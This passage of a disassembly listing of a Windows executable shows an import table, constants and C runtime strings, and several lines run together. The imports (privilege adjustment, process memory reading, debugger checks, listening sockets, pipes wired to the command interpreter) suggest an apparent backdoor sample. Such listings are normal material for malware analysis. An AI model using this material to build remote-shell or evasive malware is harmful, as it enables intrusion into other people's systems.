jmp loc_423721
; ---------------------------------------------------------------------------
align 4
loc_42EEF4: ; DATA XREF: sub_40F66B�o
mov eax, offset dword_43018C
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-10h]
jmp loc_417816
; ---------------------------------------------------------------------------
loc_42EF08: ; DATA XREF: .text:004301B4�o
lea ecx, [ebp-20h]
jmp loc_417816
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_417816
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_417816
; ---------------------------------------------------------------------------
loc_42EF20: ; DATA XREF: sub_416208�o
mov eax, offset dword_4301C8
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_419912
; ---------------------------------------------------------------------------
loc_42EF34: ; DATA XREF: sub_418010�o
mov eax, offset dword_4301EC
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
push dword ptr [ebp-10h]
call sub_421C78
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42EF4A: ; DATA XREF: sub_41CE88�o
mov eax, offset dword_430210
jmp loc_423721
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40F13B
; ---------------------------------------------------------------------------
loc_42EF5C: ; DATA XREF: sub_421C83�o
mov eax, offset dword_430270
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_423BAB
; ---------------------------------------------------------------------------
loc_42EF70: ; DATA XREF: sub_421CDD�o
mov eax, offset dword_430298
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_40F13B
; ---------------------------------------------------------------------------
loc_42EF84: ; DATA XREF: sub_421D6B�o
mov eax, offset dword_4302C0
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
dd 1Ch dup(0)
dword_42F000 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_42F004 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_42F008 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_4177A2+25�r
dword_42F00C dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_42F010 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_42F014 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueAdword_42F018 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_42F01C dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_42F020 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_42F024 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_42F028 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA align 10h
dword_42F030 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_41B575+95�r ...
dword_42F034 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFile ; sub_401EA5+43�r ...
dword_42F038 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401E76+1A�r ...
dword_42F03C dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFile ; sub_401EA5+69�r ...
dword_42F040 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_414508+83�r ...
dword_42F044 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_403B2C+8C5�r ...
dword_42F048 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_41BF58+27�r
dword_42F04C dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_403625+74�r ...
dword_42F050 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_41F331+17�r
dword_42F054 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_4128D4+1A7�r ...
dword_42F058 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_426D61+2A�r
dword_42F05C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_42F060 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_40CDE2+9B�r ...
dword_42F064 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_403B2C+44AB�r ...
dword_42F068 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_403B2C:loc_4046F6�r ...
dword_42F06C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_40CDE2+64F�r ...
dword_42F070 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA ; sub_417A90+98�r ...
dword_42F074 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_4120E9+6D�r ...
dword_42F078 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_40CDE2+5EC�r ...
dword_42F07C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_4127E6+94�r ...
dword_42F080 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_410AB7+2C�r ...
dword_42F084 dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutex ; sub_41F455+C6�r
dword_42F088 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_4130E5+4E7�r ...
dword_42F08C dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_4130E5+2CD�r ...
dword_42F090 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_42F094 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_41391C+62A�r
dword_42F098 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; .text:00413685�r ...
dword_42F09C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_4130E5+398�r ...
dword_42F0A0 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_4130E5+4C3�r ...
dword_42F0A4 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_429BA7+20D�r ...
dword_42F0A8 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_416208+37C�r ...
dword_42F0AC dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcess ; sub_42CACA+1B9�r
dword_42F0B0 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_42F0B4 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_42F0B8 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipedword_42F0BC dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_41740C+1A�r
dword_42F0C0 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryA ; sub_41EF5E+18�r ...
dword_42F0C4 dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; sub_414CF1+188�r
dword_42F0C8 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_42F0CC dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExAdword_42F0D0 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_4154DA+5A�r ...
dword_42F0D4 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_415EA7+BE�r ...
dword_42F0D8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_42F0DC dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_416208+6C9�r ...
dword_42F0E0 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_42F0E4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_417989+83�r ...
dword_42F0E8 dd 7C8643B5h ; resolved to->KERNEL32.Module32Nextdword_42F0EC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_418614+1A1�r ...
dword_42F0F0 dd 7C864230h ; resolved to->KERNEL32.Module32Firstdword_42F0F4 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_42F0F8 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_42F0FC dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_42F100 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThread ; sub_418812+1C�r
dword_42F104 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_42F108 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatAdword_42F10C dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatAdword_42F110 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_41FE93+4B�r
dword_42F114 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_42F118 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTime ; sub_41FE93+531�r
dword_42F11C dd 7C831C45h ; resolved to->KERNEL32.GetFileTime ; sub_41FE93+1B4�r
dword_42F120 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_42F124 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_42F128 dd 7C833478h ; resolved to->KERNEL32.SetEnvironmentVariableAdword_42F12C dd 7C80A35Eh ; resolved to->KERNEL32.CompareStringW ; sub_42E2C0+261�r
dword_42F130 dd 7C80D077h ; resolved to->KERNEL32.CompareStringA ; sub_42E2C0+B9�r
dword_42F134 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_42F138 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_40BB43+128�r ...
dword_42F13C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_40BB43+E�r ...
dword_42F140 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_42483C+28�r ...
dword_42F144 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_42488E+28�r ...
dword_42F148 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_40178D+162�r ...
dword_42F14C dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_42F150 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_401906+16E�r ...
dword_42F154 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40274D+1F�r ...
dword_42F158 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_40178D+EB�r ...
dword_42F15C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401477+12C�r ...
dword_42F160 dd 7C835D54h ; resolved to->KERNEL32.WritePrivateProfileStringA ; sub_41F455+94�r
dword_42F164 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_42F168 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_42F16C dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_42F170 dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_42F174 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_42BDC5:loc_42BE1B�r
dword_42F178 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_42BADD+12D�r
dword_42F17C dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_42BADD+8D�r
dword_42F180 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_42F184 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_42B533+E1�r
dword_42F188 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_42F18C dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_42F190 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_42F194 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_42F198 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_42F19C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_42ABB1+14�r ...
dword_42F1A0 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_429BA7+14D�r ...
dword_42F1A4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_429BA7+A7�r
dword_42F1A8 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_429B9A+6�r
dword_42F1AC dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_42F1B0 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_42F1B4 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_4285CC+14F�r ...
dword_42F1B8 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_42794F+51�r ...
dword_42F1BC dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree ; sub_427D40+120�r ...
dword_42F1C0 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_42F1C4 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_42F1C8 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_42F1CC dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_42840D+1�r ...
dword_42F1D0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_426B40+17A�r ...
dword_42F1D4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_42B69E+143�r
dword_42F1D8 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_42F1DC dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_42F1E0 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Errordword_42F1E4 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_42F1E8 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_42599D+34�r
dword_42F1EC dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_423F63+F6�r ...
dword_42F1F0 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_42726C+2C5�r ...
dword_42F1F4 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_42F1F8 dd 7C812A09h ; resolved to->KERNEL32.RaiseException ; sub_429F79+215�r
dword_42F1FC dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_4240A0+86�r ...
dword_42F200 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_4248E0+26�r ...
dword_42F204 dd 7C8350BFh ; resolved to->KERNEL32.GetTimeZoneInformation ; sub_42D078+4E�r
dword_42F208 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTimedword_42F20C dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_42F210 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_426B40+5E�r
dword_42F214 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_42F218 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_42F21C dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_42599D+45�r
dd 0
dword_42F224 dd 71B2517Fh dd 0
dword_42F22C dd 7712A63Fh dd 0
dword_42F234 dd 7CAB8CB2h ; sub_414983+131�r ...
dword_42F238 dd 7CA23A4Bh ; sub_414CF1+151�r
dword_42F23C dd 7CA40EE0h ; sub_414810+24�r ...
dd 0
dword_42F244 dd 7E41AE3Fh ; resolved to->USER32.CharUpperBuffAdword_42F248 dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericA ; sub_415EA7+2CB�r ...
dword_42F24C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_416208+2A9�r ...
dword_42F250 dd 7E42E5C2h ; resolved to->USER32.CharLowerA align 8
dword_42F258 dd 77C019FFh dword_42F25C dd 77C018BAh dword_42F260 dd 77C01A50h align 8
dword_42F268 dd 71AB3E00h ; resolved to->WS2_32.binddword_42F26C dd 71AB951Eh ; resolved to->WS2_32.getsocknamedword_42F270 dd 71AB88D3h ; resolved to->WS2_32.listendword_42F274 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_403B2C+6752�r ...
dword_42F278 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40F770+21C�r
dword_42F27C dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_42F280 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_42F284 dd 71AC1028h ; resolved to->WS2_32.acceptdword_42F288 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_403B2C+680A�r ...
dword_42F28C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_403B2C+6825�r ...
dword_42F290 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_40D98D+16�r ...
dword_42F294 dd 71AB406Ah ; resolved to->WS2_32.connect ; .text:0040B844�r ...
dword_42F298 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_403B2C+228D�r ...
dword_42F29C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_403B2C+677D�r ...
dword_42F2A0 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_40F770+7D�r
dword_42F2A4 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_41112E+112�r ...
dword_42F2A8 dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_41BB8F+FF�r ...
dword_42F2AC dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_40F770+1B2�r ...
dword_42F2B0 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_41130C+DB�r
dword_42F2B4 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_41B8E7+F4�r ...
dword_42F2B8 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_403B2C+67A6�r ...
align 10h
dbl_42F2C0 dq -1.52587890625e-4 ; DATA XREF: sub_403625+3DF�r
dbl_42F2C8 dq 3.0517578125e-4 ; DATA XREF: sub_403625+3C0�r
dbl_42F2D0 dq -3.0517578125e-4 ; DATA XREF: sub_403625+33E�r
; sub_403625+3A2�r
dbl_42F2D8 dq 1.52587890625e-4 ; DATA XREF: sub_403625+279�r
dbl_42F2E0 dq -1.739501953125e-3 ; DATA XREF: sub_403625+254�r
; sub_403625+2DD�r ...
dbl_42F2E8 dq 3.021240234375e-3 ; DATA XREF: sub_403625+ED�r
dbl_42F2F0 dq 3.0517578125e-5 ; DATA XREF: sub_403625+BA�r
; sub_403625+143�r ...
dbl_42F2F8 dq 6.103515625e-5 ; DATA XREF: sub_403625+9F�r
; sub_403625+309�r
dbl_42F300 dq 2.288818359375e-3 ; DATA XREF: sub_403625+2E�r
dbl_42F308 dq 9.765625e-4 ; DATA XREF: sub_40CDE2+23E�r
; sub_40CDE2+24D�r ...
off_42F310 dd offset sub_40D526 ; DATA XREF: sub_40D512+4�o
; sub_40D542+F�o ...
dword_42F314 dd 0 ; sub_40F210+72�o ...
dword_42F318 dd 10h ; sub_403B2C+5A9�r ...
flt_42F31C dd 5.0e-1 ; DATA XREF: sub_4128D4+3BD�r
; sub_41391C+582�r
dbl_42F320 dq -3.0517578125e-5 ; DATA XREF: sub_41409E+1F�r
dword_42F328 dd 0FFFFFFFFh, 41F96Ch, 41F99Dh, 0dword_42F338 dd 0FFFFFFFFh, 41FA0Ch, 41FA10h, 42FC28hoff_42F348 dd offset loc_421D37 ; DATA XREF: sub_421C83+4D�o
; sub_421D53+C�o
dd offset sub_40F344
dd offset sub_421D1A
aStringTooLong db 'string too long',0 ; DATA XREF: sub_421C83+1E�o
dd offset dword_42FC60
off_42F368 dd offset loc_40F64F ; DATA XREF: sub_40F1B0+4A�o
; sub_40F36E+8�o ...
dd offset sub_40F344
dd offset sub_40F351
dd offset dword_42FCB0
off_42F378 dd offset loc_40F64F ; DATA XREF: sub_40F0E1+4D�o
; sub_40F728+C�o ...
dd offset sub_40F344
dd offset sub_40F632
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_421D6B+1E�o
dd offset dword_42FCF8
off_42F3A0 dd offset sub_421ECD ; DATA XREF: sub_421E9B+12�o
; .text:00421F02�o ...
align 8
dword_42F3A8 dd 0FFFFFFFFh, 0 dd offset sub_42301E
dd 0FFFFFFFFh, 0
dd offset sub_42307A
dword_42F3C0 dd 0FFFFFFFFh, 0 dd offset sub_42311D
dd 0FFFFFFFFh, 0
dd offset sub_423175
dword_42F3D8 dd 6D6D6F63h, 2E646E61h, 6D6F63hdword_42F3E4 dd 632Fh aComspec db 'COMSPEC',0 ; DATA XREF: sub_423517+8�o
dword_42F3F0 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
dd offset dword_42FD28
off_42F414 dd offset sub_423B08 ; DATA XREF: sub_423B24+8�o
; sub_423B61+8�o ...
dd offset sub_423BC1
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_423BC1+7�o
align 10h
dd offset dword_42FD70
off_42F434 dd offset loc_423BF7 ; DATA XREF: sub_423BCE+5�o
; .text:off_43873C�o ...
dword_42F438 dd 0FFFFFFFFh, 0 dd offset sub_423FF7
byte_42F444 db 4 dup(0FFh), 4 dup(0), 80h, 40h, 42h, 0 ; DATA XREF: sub_42512C+4A�r
dbl_42F450 dq 1.0 ; DATA XREF: sub_4242B0+6C�r
; sub_4289FB+2A�r
dword_42F458 dd 0FFFFFFFFh, 424FACh, 424FC0hbyte_42F464 db 6 ; DATA XREF: sub_42512C:loc_425183�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_4496BC�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: .text:off_4496B8�o
align 4
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_427054+8E�o
align 10h
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_427054+4F�o
align 4
dword_42F508 dd 0FFFFFFFFh, 0 dd offset sub_42874F
dd 0FFFFFFFFh, 0
dd offset sub_42889F
dword_42F520 dd 0FFFFFFFFh, 0 dd offset sub_428962
dd 0FFFFFFFFh, 0
dd offset sub_4289DD
dbl_42F538 dq 4.195835e6 ; DATA XREF: sub_4289FB+F�r
dbl_42F540 dq 3.145727e6 ; DATA XREF: sub_4289FB+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_428A39+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_428A39�o
align 10h
dbl_42F570 dq 0.0 ; DATA XREF: sub_428B0A+6�r
; sub_42A22C+8C�r ...
aE000 db 'e+000',0 ; DATA XREF: sub_428BC1+57�o
align 10h
aPath_0 db 'PATH',0 ; DATA XREF: sub_428E88+49�o
align 4
a_exe db '.exe',0 ; DATA XREF: .text:0044BB80�o
align 10h
a_bat db '.bat',0 ; DATA XREF: .text:0044BB7C�o
align 4
a_cmd db '.cmd',0 ; DATA XREF: .text:off_44BB78�o
align 10h
a__1 db '.\',0 ; DATA XREF: sub_428FED+51�o
align 8
dword_42F5A8 dd 0FFFFFFFFh, 4295E1h, 4295EBh, 0dword_42F5B8 dd 0FFFFFFFFh, 0 dd offset loc_429770
align 8
dd offset sub_42974E
dd offset sub_429758
dword_42F5D0 dd 0FFFFFFFFh, 4299A6h, 4299AAh, 0dword_42F5E0 dd 0FFFFFFFFh, 429A08h, 429A11h, 0dword_42F5F0 dd 0FFFFFFFFh, 0 dd offset loc_429AE8
align 10h
dd offset loc_429AD4
dd offset loc_429AD8
dword_42F608 dd 0FFFFFFFFh, 0 dd offset loc_429B3E
align 8
dd offset loc_429B2A
dd offset loc_429B2E
dword_42F620 dd 2 dup(0) ; sub_42BADD+39�o ...
dword_42F628 dd 0FFFFFFFFh, 429CB7h, 429CBBh, 0FFFFFFFFh, 429D6Bh, 429D6Fh
; DATA XREF: sub_429BA7+5�o
dd 6E795Fh, 31795Fh, 30795Fh, 78657266h, 70h, 646F6D66h
dd 0
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: .text:off_44BCA4�o
aRuntimeError db 'runtime error ',0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_44BF3C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_42B69E+119�o
align 4
asc_42F9A4 db 0Ah ; DATA XREF: sub_42B69E+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_42B69E+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_42B69E+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_42B69E+7D�o
align 10h
dword_42F9E0 dd 0FFFFFFFFh, 42BBD6h, 42BBDAhaSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_42D078+2A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_42D64E+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_42D64E+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_42D64E+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_42E02D:loc_42E122�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_42E02D+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_42E02D+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_42E02D+AD�o
align 10h
dword_42FA80 dd 0FFFFFFFFh, 42E477h, 42E47Bh, 0FFFFFFFFh, 42E4E6h, 42E4EAh
; DATA XREF: sub_42E2C0+5�o
dd 6D6D3A48h, 73733Ah, 64646464h, 4D4D202Ch, 64204D4Dh
dd 79202C64h, 797979h, 2F642F4Dh, 7979h, 4D50h, 4D41h
dd 65636544h, 7265626Dh, 0
aNovember db 'November',0 ; DATA XREF: .text:0044C1C8�o
align 4
aOctober db 'October',0 ; DATA XREF: .text:0044C1C4�o
aSeptember db 'September',0 ; DATA XREF: .text:0044C1C0�o
align 10h
aAugust db 'August',0 ; DATA XREF: .text:0044C1BC�o
align 4
aJuly db 'July',0 ; DATA XREF: .text:0044C1B8�o
align 10h
aJune db 'June',0 ; DATA XREF: .text:0044C1B4�o
align 4
aApril db 'April',0 ; DATA XREF: .text:0044C1AC�o
align 10h
aMarch db 'March',0 ; DATA XREF: .text:0044C1A8�o
align 4
aFebruary db 'February',0 ; DATA XREF: .text:0044C1A4�o
align 4
aJanuary db 'January',0 ; DATA XREF: .text:0044C1A0�o
off_42FB2C dd offset dword_636544 ; DATA XREF: .text:0044C19C�o
dword_42FB30 dd 766F4Eh, 74634Fh, 706553h, 677541h, 6C754Ah, 6E754Ah
; DATA XREF: .text:0044C198�o
; .text:0044C194�o ...
dd 79614Dh, 727041h, 72614Dh, 626546h, 6E614Ah, 75746153h
dd 79616472h, 0
aFriday db 'Friday',0 ; DATA XREF: .text:0044C168�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: .text:0044C164�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .text:0044C160�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: .text:0044C15C�o
aMonday db 'Monday',0 ; DATA XREF: .text:0044C158�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .text:0044C154�o
align 10h
aSat db 'Sat',0 ; DATA XREF: .text:0044C150�o
